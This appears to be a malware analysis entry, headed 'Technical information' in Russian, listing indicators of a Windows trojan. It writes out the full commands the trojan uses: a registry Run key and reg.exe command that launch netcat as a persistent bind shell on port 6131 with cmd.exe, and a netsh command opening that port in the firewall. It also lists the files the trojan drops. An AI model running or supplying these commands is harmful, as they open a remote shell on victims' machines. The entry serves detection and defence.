Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'nc' = '<SYSTEM32>\nc.exe -d -l -L -p 6131 -e cmd.exe'
- <SYSTEM32>\nc.exe -d -l -L -p 6131 -e cmd.exe
- <SYSTEM32>\netsh.exe firewall add portopening TCP 6131 "NetcatIsInYourPc" ENABLE ALL
- <SYSTEM32>\reg.exe add HKLM\software\microsoft\windows\currentversion\run /V nc /D "<SYSTEM32>\nc.exe -d -l -L -p 6131 -e cmd.exe
- %WINDIR%\trollface.png
- <SYSTEM32>\nc.exe
- %TEMP%\a75496.bat
- <LS_APPDATA>\nc.exe
- <LS_APPDATA>\trollface.png
- %TEMP%\a75496.bat